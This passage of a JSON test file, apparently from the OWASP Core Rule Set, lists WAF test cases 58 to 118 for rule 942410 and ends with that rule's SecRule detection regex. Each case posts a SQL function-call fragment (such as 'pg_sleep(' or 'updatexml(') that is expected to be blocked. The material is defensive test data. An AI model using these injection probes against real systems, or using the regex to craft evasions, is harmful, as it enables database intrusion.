"data": "pay=local%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=local%28" } ] }, { "description": "SQL Injection Attack", "test_id": 58, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=log%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=log%28" } ] }, { "description": "SQL Injection Attack", "test_id": 59, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=log%26%26%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=log%26%26%28" } ] }, { "description": "SQL Injection Attack", "test_id": 60, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=lower%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=lower%28" } ] }, { "description": "SQL Injection Attack", "test_id": 61, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=MAKE_SET%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=MAKE_SET%28" } ] }, { "description": "SQL Injection Attack", "test_id": 62, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=MAX%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=MAX%28" } ] }, { "description": "SQL Injection Attack", "test_id": 63, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=md5%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=md5%28" } ] }, { "description": "SQL Injection Attack", "test_id": 64, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=md5%5C%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=md5%5C%28" } ] }, { "description": "SQL Injection Attack", "test_id": 65, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=MID%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=MID%28" } ] }, { "description": "SQL Injection Attack", "test_id": 66, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=minute+%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=minute+%28" } ] }, { "description": "SQL Injection Attack", "test_id": 67, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=month%3D%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=month%3D%28" } ] }, { "description": "SQL Injection Attack", "test_id": 68, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "name_const(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "name_const(" } ] }, { "description": "SQL Injection Attack", "test_id": 69, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "now(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "now(" } ] }, { "description": "SQL Injection Attack", "test_id": 70, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "nOW(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "nOW(" } ] }, { "description": "SQL Injection Attack", "test_id": 71, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "ord(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "ord(" } ] }, { "description": "SQL Injection Attack", "test_id": 72, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "password?(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "password?(" } ] }, { "description": "SQL Injection Attack", "test_id": 73, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "password/?(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "password/?(" } ] }, { "description": "SQL Injection Attack", "test_id": 74, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "Password>$(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "Password>$(" } ] }, { "description": "SQL Injection Attack", "test_id": 75, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pg_sleep(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pg_sleep(" } ] }, { "description": "SQL Injection Attack", "test_id": 76, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pi(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pi(" } ] }, { "description": "SQL Injection Attack", "test_id": 77, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "PI(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "PI(" } ] }, { "description": "SQL Injection Attack", "test_id": 78, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pow(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pow(" } ] }, { "description": "SQL Injection Attack", "test_id": 79, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "POW(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "POW(" } ] }, { "description": "SQL Injection Attack", "test_id": 80, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "quarter. (" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "quarter. (" } ] }, { "description": "SQL Injection Attack", "test_id": 81, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "rand(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "rand(" } ] }, { "description": "SQL Injection Attack", "test_id": 82, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "Rand (" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "Rand (" } ] }, { "description": "SQL Injection Attack", "test_id": 83, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "RAND(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "RAND(" } ] }, { "description": "SQL Injection Attack", "test_id": 84, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "replace(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "replace(" } ] }, { "description": "SQL Injection Attack", "test_id": 85, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "REPLACE(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "REPLACE(" } ] }, { "description": "SQL Injection Attack", "test_id": 86, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "round (" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "round (" } ] }, { "description": "SQL Injection Attack", "test_id": 87, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "round(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "round(" } ] }, { "description": "SQL Injection Attack", "test_id": 88, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "rtrim(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "rtrim(" } ] }, { "description": "SQL Injection Attack", "test_id": 89, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "RTRIM(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "RTRIM(" } ] }, { "description": "SQL Injection Attack", "test_id": 90, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=sin (" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=sin (" } ] }, { "description": "SQL Injection Attack", "test_id": 91, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "SIN(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "SIN(" } ] }, { "description": "SQL Injection Attack", "test_id": 92, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=sleep(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=sleep(" } ] }, { "description": "SQL Injection Attack", "test_id": 93, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "SLEEP (" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "SLEEP (" } ] }, { "description": "SQL Injection Attack", "test_id": 94, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=strcmp(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=strcmp(" } ] }, { "description": "SQL Injection Attack", "test_id": 95, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=substr(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=substr(" } ] }, { "description": "SQL Injection Attack", "test_id": 96, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "SUBSTR(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "SUBSTR(" } ] }, { "description": "SQL Injection Attack", "test_id": 97, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=substring(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=substring(" } ] }, { "description": "SQL Injection Attack", "test_id": 98, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "SUBSTRING(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "SUBSTRING(" } ] }, { "description": "SQL Injection Attack", "test_id": 99, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=sysdate(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=sysdate(" } ] }, { "description": "SQL Injection Attack", "test_id": 100, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "time (" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "time (" } ] }, { "description": "SQL Injection Attack", "test_id": 101, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=time%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=time%28" } ] }, { "description": "SQL Injection Attack", "test_id": 102, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=trim%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=trim%28" } ] }, { "description": "SQL Injection Attack", "test_id": 103, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=Uncompress+%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=Uncompress+%28" } ] }, { "description": "SQL Injection Attack", "test_id": 104, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=unhex%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=unhex%28" } ] }, { "description": "SQL Injection Attack", "test_id": 105, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=uNhEx%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=uNhEx%28" } ] }, { "description": "SQL Injection Attack", "test_id": 106, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=updatexml%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=updatexml%28" } ] }, { "description": "SQL Injection Attack", "test_id": 107, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=UpdateXML%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=UpdateXML%28" } ] }, { "description": "SQL Injection Attack", "test_id": 108, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=UPPER%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=UPPER%28" } ] }, { "description": "SQL Injection Attack", "test_id": 109, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=user+%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=user+%28" } ] }, { "description": "SQL Injection Attack", "test_id": 110, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=user%2F%3F%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=user%2F%3F%28" } ] }, { "description": "SQL Injection Attack", "test_id": 111, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=user%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=user%28" } ] }, { "description": "SQL Injection Attack", "test_id": 112, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=values+%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=values+%28" } ] }, { "description": "SQL Injection Attack", "test_id": 113, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=VALUES%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=VALUES%28" } ] }, { "description": "SQL Injection Attack", "test_id": 114, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=version%3D%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=version%3D%28" } ] }, { "description": "SQL Injection Attack", "test_id": 115, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=version%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=version%28" } ] }, { "description": "SQL Injection Attack", "test_id": 116, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=xmltype%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=xmltype%28" } ] }, { "description": "SQL Injection Attack", "test_id": 117, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=XMLType%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=XMLType%28" } ] }, { "description": "SQL Injection Attack", "test_id": 118, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=year%5D%3D%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=year%5D%3D%28" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 1200, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES", "variable_part": "/_pk_ref/", "quote_type": "no_quote", "negated": true, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)\\b(?:a(?:(?:b|co)s|dd(?:dat|tim)e|es_(?:de|en)crypt|s(?:in|cii(?:str)?)|tan2?|vg)|b(?:enchmark|i(?:n(?:_to_num)?|t_(?:and|count|length|x?or)))|c(?:ast|h(?:ar(?:(?:acter)?_length|set)?|r)|iel(?:ing)?|o(?:alesce|ercibility|(?:mpres)?s|n(?:cat(?:_ws)?|nection_id|v(?:ert(?:_tz)?)?)|(?:un)?t)|r32|ur(?:(?:dat|tim)e|rent_(?:date|time(?:stamp)?|user)))|d(?:a(?:t(?:abase|e(?:_(?:add|format|sub)|diff)?)|y(?:name|of(?:month|week|year))?)|count|e(?:code|(?:faul|s_(?:de|en)cryp)t|grees)|ump)|e(?:lt|nc(?:ode|rypt)|x(?:p(?:ort_set)?|tract(?:value)?))|f(?:i(?:eld(?:_in_set)?|nd_in_set)|loor|o(?:rmat|und_rows)|rom_(?:base64|days|unixtime))|g(?:et_(?:format|lock)|r(?:eates|oup_conca)t)|h(?:ex(?:toraw)?|our)|i(?:f(?:null)?|n(?:et6?_(?:aton|ntoa)|s(?:ert|tr)|terval)?|s(?:_(?:(?:free|used)_lock|ipv(?:4(?:_(?:compat|mapped))?|6)|n(?:ot(?:_null)?|ull))|null)?)|l(?:ast(?:_(?:day|insert_id))?|case|e(?:(?:as|f)t|ngth)|n|o(?:ad_file|ca(?:l(?:timestamp)?|te)|g(?:10|2)?|wer)|pad|trim)|m(?:a(?:ke(?:date|_set)|ster_pos_wait|x)|d5|i(?:(?:crosecon)?d|n(?:ute)?)|o(?:d|nth(?:name)?))|n(?:ame_const|o(?:t_in|w)|ullif)|o(?:ct(?:et_length)?|(?:ld_passwo)?rd)|p(?:assword|eriod_(?:add|diff)|g_sleep|i|o(?:sition|w(?:er)?)|rocedure_analyse)|qu(?:arter|ote)|r(?:a(?:dians|nd|wto(?:hex|nhex(?:toraw)?))|e(?:lease_lock|p(?:eat|lace)|verse)|ight|o(?:und|w_count)|pad|trim)|s(?:chema|e(?:c(?:ond|_to_time)|ssion_user)|ha[12]?|ig?n|leep|oundex|pace|qrt|t(?:d(?:dev(?:_(?:po|sam)p)?)?|r(?:cmp|_to_date))|u(?:b(?:(?:dat|tim)e|str(?:ing(?:_index)?)?)|m)|ys(?:date|tem_user))|t(?:an|ime(?:diff|_(?:format|to_sec)|stamp(?:add|diff)?)?|o_(?:base64|n?char|(?:day|second)s)|r(?:im|uncate))|u(?:case|n(?:compress(?:ed_length)?|hex|ix_timestamp)|p(?:datexml|per)|ser|tc_(?:date|time(?:stamp)?)|uid(?:_short)?)|v(?:a(?:lues|r(?:iance|_(?:po|sam)p))|e